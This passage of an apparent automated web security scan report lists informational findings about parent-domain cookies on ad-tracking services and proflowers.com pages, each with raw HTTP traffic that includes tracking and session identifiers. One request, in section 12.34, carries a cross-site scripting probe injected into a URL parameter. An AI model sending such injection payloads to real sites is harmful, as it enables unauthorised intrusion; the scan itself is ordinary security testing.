QLSGHHxZcNV7DJc5sT00OUsUVmrKDXWc+nRcX1WiQ/VkP0PS/bC1/DbhNecPWVRE0AXkOh/IOoVf06+8SOgC8Ev3jO0RbucQa8aazOvezkk7z
eyQCkyl2Mc4X9xCgxUsXK9DtZSCJK6m2R/mQCTbaItUg3/6EIcy8zL2Scsdi6aQPsU9UrkfVegfH0Uty3GkCV77GW5oseV6DHz9+RNhUmepmjvJu5cKj0grDAv9MP790ikGiL9Vbfl+2hPsPfIsGhjWXsvCaPLDLnnlLu7s6jCtbDAg+6/AWwustsHfWZNO9mP2B2hNB72eXivVKC3ScCpTMJq/yXGNl7gyrzILPyfzvctlhE7tAAL1KCRqQVBYdg=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_dGQ8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:18:55 GMT; Path=/
Set-Cookie: rtc_OGR2=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:18:55 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:18:54 GMT


12.30. http://pixel.fetchback.com/serve/fb/pdc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3006 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304902865_11051:0_13981:207803_13479:207803_15758:367136_12704:367136_4895:795321_10164:1159597_10638:1159597_10640:1159597_10641:1159597_1437:1159597_1660:1723193; uid=1_1304902865_1303179323923:6792170478871670; kwd=1_1304902865_12936:207803_11317:1159597_11717:1159597_11718:1159597_11719:1159597; sit=1_1304902865_3006:0:0_3455:207803:207803_2988:430083:395912_3801:542526:542106_1714:827059:795321_3306:1054685:367136_719:1160424:1159597_2451:1211293:1206193_3236:1369256:1369138_782:1723542:1723193; cre=1_1304902865_29802:59536:1:541894_29805:59534:1:542555; bpd=1_1304902865_1ZCU5:4QMi; apd=1_1304902865; scg=1_1304902865; ppd=1_1304902865; afl=1_1304902865

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:01:13 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: cmp=1_1304902873_11051:0_13981:207811_13479:207811_15758:367144_12704:367144_4895:795329_10164:1159605_10638:1159605_10640:1159605_10641:1159605_1437:1159605_1660:1723201; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: uid=1_1304902873_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: kwd=1_1304902873_12936:207811_11317:1159605_11717:1159605_11718:1159605_11719:1159605; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: sit=1_1304902873_3006:8:0_3455:207811:207811_2988:430091:395920_3801:542534:542114_1714:827067:795329_3306:1054693:367144_719:1160432:1159605_2451:1211301:1206201_3236:1369264:1369146_782:1723550:1723201; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: cre=1_1304902873_29802:59536:1:541902_29805:59534:1:542563; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: bpd=1_1304902873_1ZCU5:4QMq; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: apd=1_1304902873; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: scg=1_1304902873; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: ppd=1_1304902873; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: afl=1_1304902873; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 01:01:13 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 290

<!-- campaign #11051 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(tim
...[SNIP]...

12.31. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-0fxbD82AR3K-g.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-0fxbD82AR3K-g.gif?labels=_fp.event.Welcome HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EIcAGO8kjVmtjIMIufKMgQG7AQHYBoG0AJrRo5lYEPGaOCbTzF4os9HUosxSCyo0wR_hEMIAwfEIICDSDiAJ0Tu2CpGSx0MQIRgguzLBLTOBKCAwLh6DS1OfFABNIA6JIA4QC-ILZLEIJIstOUo4sjA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EJcAJe8kjVmM-5GL0ZmY8frRi58oyBABuwEB2gaB9ACa0aOZWBDxmjgm08xeKLPR1KLMUgsqNMEf4RDCAMHxCCAg0g4gCdE7tgqRksdDECEYILsywS0zgSggMC4eg0tTnxQATSAOiSAOEAviC2SxCCSLLTlKOLIw; expires=Sun, 07-Aug-2011 01:01:00 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Mon, 09 May 2011 01:01:00 GMT
Server: QS

GIF89a.......,.................D..;

12.32. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=5970|1|14 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1185=2931142961646634775; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi15=3153732.js^1^1304367467^1304367467&3166422.js^1^1304366186^1304366186&3140642.js^2^1304363213^1304364698&3167237.js^2^1304361606^1304361617&3200915.js^1^1304360968^1304360968&3203914.js^3^1304360291^1304360963&3190993.js^3^1304358760^1304359002&3151969.js^2^1304340485^1304341092&3151966.js^2^1304340392^1304340510&3199969.js^1^1304340482^1304340482&3186719.js^2^1304340387^1304340476&3188306.js^1^1304340471^1304340471&3196947.js^1^1304340427^1304340427&3201778.js^1^1304340414^1304340414&3151650.js^3^1304340335^1304340359; ruid=154dab7990adc1d6f3372c12^8^1304807875^2915161843; csi2=3204821.js^1^1304807875^1304807875; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264212%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1; 
rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C402%2C3%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C191%2C3%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C%265487%3D11723%2C0%2C1%2C%2C; put_1986=2724386019227846218; cd=false

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264212%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%265970%3D1; expires=Wed, 08-Jun-2011 01:02:40 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C402%2C3%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C191%2C3%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C%265487%3D11723%2C0%2C1%2C%2C%265970%3D11825%2C0%2C1%2C14%2C; expires=Wed, 08-Jun-2011 01:02:40 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

12.33. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:50 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:08:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:51 GMT
Content-Length: 144498


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

12.34. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:18:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:18:27 GMT
Content-Length: 136888


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

12.35. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:27 GMT
Content-Length: 139819


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

12.36. http://segment-pixel.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=39804&partnerID=91&clientID=4744&key=segment&returnType=js HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; 
segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJND15BrQSKBAOAD4/P74="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 01:02:39 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 01:02:19 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8b9woJV/tjEJrH/yDGglUIADAEVAP+s="; Domain=invitemedia.com; expires=Tue, 08-May-2012 01:02:39 GMT; Path=/
Content-Length: 344

makePixelRequest("http://ad.yieldmanager.com/pixel?id=1095653&t=2","image");

function makePixelRequest(pixelURL,pixelType){

if(pixelType == "javascript")
{
document.write('<script sr
...[SNIP]...

12.37. http://t.p.mybuys.com/webrec/wr.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

